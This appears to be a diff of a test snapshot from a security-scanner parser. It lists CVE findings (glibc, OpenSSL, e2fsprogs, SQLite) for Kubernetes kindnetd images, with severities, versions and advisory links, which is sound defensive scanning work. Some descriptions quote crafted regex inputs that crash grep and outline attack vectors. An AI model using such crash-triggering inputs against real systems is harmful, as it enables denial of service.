"https://linux.oracle.com/errata/ELSA-2021-9151.html", + "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", + "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "https://rustsec.org/advisories/RUSTSEC-2021-0055", + "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", + "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "https://security.gentoo.org/glsa/202103-03", + "https://security.netapp.com/advisory/ntap-20210326-0006/", + "https://security.netapp.com/advisory/ntap-20210513-0002/", + "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "https://ubuntu.com/security/notices/USN-4891-1", + "https://ubuntu.com/security/notices/USN-5038-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3449", + "https://www.debian.org/security/2021/dsa-4875", + "https://www.openssl.org/news/secadv/20210325.txt", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuApr2021.html", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-05", + "https://www.tenable.com/security/tns-2021-06", + "https://www.tenable.com/security/tns-2021-09", + "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in grep.", + "description": "An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", + "name": "openssl: NULL pointer dereference in signature_algorithms processing", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-20796", + "value": "https://avd.aquasec.com/nvd/cve-2021-3449", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/107160", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-20796", + "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", }, { "type": "URL", - "value": "https://debbugs.gnu.org/cgi/bugreport.cgi?bug=34141", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", }, { "type": "URL", - "value": "https://lists.gnu.org/archive/html/bug-gnulib/2019-01/msg00108.html", + "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-20796", + "value": "https://access.redhat.com/security/cve/CVE-2021-3449", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20190315-0002/", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-20796", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010022", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010022", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", - "https://security-tracker.debian.org/tracker/CVE-2019-1010022", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", - "https://ubuntu.com/security/CVE-2019-1010022", - "https://www.cve.org/CVERecord?id=CVE-2019-1010022", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass stack guard protection. The component is: nptl. The attack vector is: Exploit stack buffer overflow vulnerability and use this bypass vulnerability to bypass stack guard. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: stack guard protection bypass", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010022", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010022", + "value": "https://github.com/advisories/GHSA-83mx-573x-5rw9", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010022", + "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010022", + "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850", + "value": "https://linux.oracle.com/cve/CVE-2021-3449.html", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22850#c3", + "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010022", + "value": "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010022", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010023", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", - "references": [ - "http://www.securityfocus.com/bid/109167", - "https://access.redhat.com/security/cve/CVE-2019-1010023", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", - "https://security-tracker.debian.org/tracker/CVE-2019-1010023", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", - "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010023", - "https://www.cve.org/CVERecord?id=CVE-2019-1010023", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Re-mapping current loaded library with malicious ELF file. The impact is: In worst case attacker may evaluate privileges. The component is: libld. The attack vector is: Attacker sends 2 ELF files to victim and asks to run ldd on it. ldd execute code. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: running ldd on malicious ELF leads to code execution because of wrong size computation", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010023", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109167", + "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010023", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010023", + "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010023", + "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22851", + "value": "https://security.gentoo.org/glsa/202103-03", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K11932200?utm_source=f5support&utm_medium=RSS", + "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010023", + "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010023", + "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010024", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", - "references": [ - "http://www.securityfocus.com/bid/109162", - "https://access.redhat.com/security/cve/CVE-2019-1010024", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", - "https://security-tracker.debian.org/tracker/CVE-2019-1010024", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010024", - "https://www.cve.org/CVERecord?id=CVE-2019-1010024", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may bypass ASLR using cache of thread stack and heap. The component is: glibc. NOTE: Upstream comments indicate "this is being treated as a non-security bug and no real threat."", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: ASLR bypass using cache of thread stack and heap", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010024", + "value": "https://ubuntu.com/security/notices/USN-4891-1", }, { "type": "URL", - "value": "http://www.securityfocus.com/bid/109162", + "value": "https://ubuntu.com/security/notices/USN-5038-1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010024", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3449", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010024", + "value": "https://www.debian.org/security/2021/dsa-4875", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010024", + "value": "https://www.openssl.org/news/secadv/20210325.txt", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22852", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010024", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010024", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-05", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-06", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-09", + }, + { + "type": "URL", + "value": "https://www.tenable.com/security/tns-2021-10", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-1010025", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", + "fixedVersion": "1.1.1d-0+deb10u8", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-4160", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/security/cve/CVE-2019-1010025", - "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", - "https://security-tracker.debian.org/tracker/CVE-2019-1010025", - "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", - "https://support.f5.com/csp/article/K06046097", - "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", - "https://ubuntu.com/security/CVE-2019-1010025", - "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "https://access.redhat.com/security/cve/CVE-2021-4160", + "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", + "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", + "https://security.gentoo.org/glsa/202210-02", + "https://www.cve.org/CVERecord?id=CVE-2021-4160", + "https://www.debian.org/security/2022/dsa-5103", + "https://www.openssl.org/news/secadv/20220128.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujul2022.html", ], }, "category": "Vulnerability", - "description": "** DISPUTED ** GNU Libc current is affected by: Mitigation bypass. The impact is: Attacker may guess the heap addresses of pthread_created thread. The component is: glibc. NOTE: the vendor's position is "ASLR bypass itself is not a vulnerability."", + "description": "There is a carry propagation bug in the MIPS32 and MIPS64 squaring procedure. Many EC algorithms are affected, including some of the TLS 1.3 default curves. Impact was not analyzed in detail, because the pre-requisites for attack are considered unlikely and include reusing private keys. Analysis suggests that attacks against RSA and DSA as a result of this defect would be very difficult to perform and are not believed likely. Attacks against DH are considered just feasible (although very difficult) because most of the work necessary to deduce information about a private key may be performed offline. The amount of resources required for such an attack would be significant. However, for an attack on TLS to be meaningful, the server would have to share the DH private key among multiple clients, which is no longer an option since CVE-2016-0701. This issue affects OpenSSL versions 1.0.2, 1.1.1 and 3.0.0. It was addressed in the releases of 1.1.1m and 3.0.1 on the 15th of December 2021. For the 1.0.2 release it is addressed in git commit 6fc1aaaf3 that is available to premium support customers only. It will be made available in 1.0.2zc when it is released. The issue only affects OpenSSL on MIPS platforms. Fixed in OpenSSL 3.0.1 (Affected 3.0.0). Fixed in OpenSSL 1.1.1m (Affected 1.1.1-1.1.1l). Fixed in OpenSSL 1.0.2zc-dev (Affected 1.0.2-1.0.2zb).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "glibc: information disclosure of heap addresses of pthread_created thread", + "name": "openssl: Carry propagation bug in the MIPS32 and MIPS64 squaring procedure", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-1010025", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-1010025", - }, - { - "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-1010025", + "value": "https://avd.aquasec.com/nvd/cve-2021-4160", }, { "type": "URL", - "value": "https://security-tracker.debian.org/tracker/CVE-2019-1010025", + "value": "https://access.redhat.com/security/cve/CVE-2021-4160", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=22853", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=3bf7b73ea7123045b8f972badc67ed6878e6c37f", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K06046097?utm_source=f5support&utm_medium=RSS", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=6fc1aaaf303185aa5e483e06bdfae16daa9193a7", }, { "type": "URL", - "value": "https://ubuntu.com/security/CVE-2019-1010025", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=e9e726506cd2a3fd9c0f12daf8cc1fe934c7dddb", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-1010025", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-4160", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-9192", - "installedVersion": "2.31-13+deb11u3", - "packageName": "libc6", - "references": [ - "https://access.redhat.com/security/cve/CVE-2019-9192", - "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", - "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", - "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", - "https://www.cve.org/CVERecord?id=CVE-2019-9192", - ], - }, - "category": "Vulnerability", - "description": "** DISPUTED ** In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(|)(\\\\1\\\\1)*' in grep, a different issue than CVE-2018-20796. NOTE: the software maintainer disputes that this is a vulnerability because the behavior occurs only with a crafted pattern.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "glibc: uncontrolled recursion in function check_dst_limits_calc_pos_1 in posix/regexec.c", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-9192", + "value": "https://security.gentoo.org/glsa/202210-02", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-9192", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-4160", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-9192", + "value": "https://www.debian.org/security/2022/dsa-5103", }, { "type": "URL", - "value": "https://sourceware.org/bugzilla/show_bug.cgi?id=24269", + "value": "https://www.openssl.org/news/secadv/20220128.txt", }, { "type": "URL", - "value": "https://support.f5.com/csp/article/K26346590?utm_source=f5support&utm_medium=RSS", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2019-9192", + "value": "https://www.oracle.com/security-alerts/cpujul2022.html", }, ], - "severity": "LOW", + "severity": "MEDIUM", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-1304", - "installedVersion": "1.46.2-2", - "packageName": "libcom-err2", + "fixedVersion": "1.1.1n-0+deb10u4", + "foundIn": "Target: 'docker.io/kindest/kindnetd:v20210326-1e038dc5 (debian 10.7)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-2097", + "installedVersion": "1.1.1d-0+deb10u4", + "packageName": "libssl1.1", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8361", - "https://access.redhat.com/security/cve/CVE-2022-1304", - "https://bugzilla.redhat.com/2069726", - "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", - "https://errata.almalinux.org/9/ALSA-2022-8361.html", - "https://errata.rockylinux.org/RLSA-2022:8361", - "https://linux.oracle.com/cve/CVE-2022-1304.html", - "https://linux.oracle.com/errata/ELSA-2022-8361.html", - "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", - "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", - "https://ubuntu.com/security/notices/USN-5464-1", - "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "https://access.redhat.com/errata/RHSA-2022:6224", + "https://access.redhat.com/security/cve/CVE-2022-2097", + "https://bugzilla.redhat.com/2081494", + "https://bugzilla.redhat.com/2087911", + "https://bugzilla.redhat.com/2087913", + "https://bugzilla.redhat.com/2097310", + "https://bugzilla.redhat.com/2104905", + "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", + "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", + "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", + "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", + "https://errata.almalinux.org/9/ALSA-2022-6224.html", + "https://errata.rockylinux.org/RLSA-2022:5818", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", + "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", + "https://linux.oracle.com/cve/CVE-2022-2097.html", + "https://linux.oracle.com/errata/ELSA-2022-9751.html", + "https://lists.debian.org/debian-lts-announce/2023/02/msg00019.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/R6CK57NBQFTPUMXAPJURCGXUYT76NQAK/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V6567JERRHHJW2GNGJGKDRNHR7SNPZK7/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VCMNWKERPBKOEBNL7CLTTX3ZZCZLH7XA/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-2097", + "https://rustsec.org/advisories/RUSTSEC-2022-0032.html", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20220715-0011/", + "https://security.netapp.com/advisory/ntap-20230420-0008/", + "https://ubuntu.com/security/notices/USN-5502-1", + "https://www.cve.org/CVERecord?id=CVE-2022-2097", + "https://www.debian.org/security/2023/dsa-5343", + "https://www.openssl.org/news/secadv/20220705.txt", ], }, "category": "Vulnerability", - "description": "An out-of-bounds read/write vulnerability was found in e2fsprogs 1.46.5. This issue leads to a segmentation fault and possibly arbitrary code execution via a specially crafted filesystem.", + "description": "AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p).", "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", "mitigation": undefined, - "name": "e2fsprogs: out-of-bounds read/write via crafted filesystem", + "name": "AES OCB fails to encrypt some bytes", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-1304", + "value": "https://avd.aquasec.com/nvd/cve-2022-2097", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8361", + "value": "https://access.redhat.com/errata/RHSA-2022:6224", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-1304", + "value": "https://access.redhat.com/security/cve/CVE-2022-2097", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2069726", + "value": "https://bugzilla.redhat.com/2081494", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2069726", + "value": "https://bugzilla.redhat.com/2087911", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1304", + "value": "https://bugzilla.redhat.com/2087913", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8361.html", + "value": "https://bugzilla.redhat.com/2097310", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8361", + "value": "https://bugzilla.redhat.com/2104905", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-1304.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081494", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8361.html", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2097310", }, { "type": "URL", - "value": "https://marc.info/?l=linux-ext4&m=165056234501732&w=2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2100554", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1304", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2104905", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5464-1", + "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-332410.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-1304", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1292", }, - ], - "severity": "HIGH", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'docker.io/kindest/kindnetd:v20220510-4929dd75 (debian 11.3)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2019-8457", - "installedVersion": "5.3.28+dfsg1-0.8", - "packageName": "libdb5.3", - "references": [ - "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", - "https://access.redhat.com/security/cve/CVE-2019-8457", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", - "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", - "https://linux.oracle.com/cve/CVE-2019-8457.html", - "https://linux.oracle.com/errata/ELSA-2020-1810.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SJPFGA45DI4F5MCF2OAACGH3HQOF4G3M/", - "https://nvd.nist.gov/vuln/detail/CVE-2019-8457", - "https://security.netapp.com/advisory/ntap-20190606-0002/", - "https://ubuntu.com/security/notices/USN-4004-1", - "https://ubuntu.com/security/notices/USN-4004-2", - "https://ubuntu.com/security/notices/USN-4019-1", - "https://ubuntu.com/security/notices/USN-4019-2", - "https://usn.ubuntu.com/4004-1/", - "https://usn.ubuntu.com/4004-2/", - "https://usn.ubuntu.com/4019-1/", - "https://usn.ubuntu.com/4019-2/", - "https://www.cve.org/CVERecord?id=CVE-2019-8457", - "https://www.oracle.com/security-alerts/cpuapr2020.html", - "https://www.oracle.com/security-alerts/cpujan2020.html", - "https://www.oracle.com/security-alerts/cpujul2020.html", - "https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", - "https://www.sqlite.org/releaselog/3_28_0.html", - "https://www.sqlite.org/src/info/90acdbfce9c08858", - ], - }, - "category": "Vulnerability", - "description": "SQLite3 from 3.6.0 to and including 3.27.2 is vulnerable to heap out-of-bound read in the rtreenode() function when handling invalid rtree tables.", - "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kindnet", - "mitigation": undefined, - "name": "sqlite: heap out-of-bound read in function rtreenode()", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2019-8457", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2068", }, { "type": "URL", - "value": "http://lists.opensuse.org/opensuse-security-announce/2019-06/msg00074.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2097", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2019-8457", + "value": "https://errata.almalinux.org/9/ALSA-2022-6224.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8457", + "value": "https://errata.rockylinux.org/RLSA-2022:5818", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10365", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=919925673d6c9cfed3c1085497f5dfbbed5fc431", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2019-8457.html", + "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=a98f339ddd7e8f487d6e0088d4a9a42324885a93", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2020-1810.html", + "value": "https://github.com/advisories/GHSA-3wx7-46ch-7rq2", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OPKYSWCOM3CL66RI76TYVIG6TJ263RXH/", + "value": "https://linux.oracle.com/cve/CVE-2022-2097.html", }, { "type": "URL", - "value": 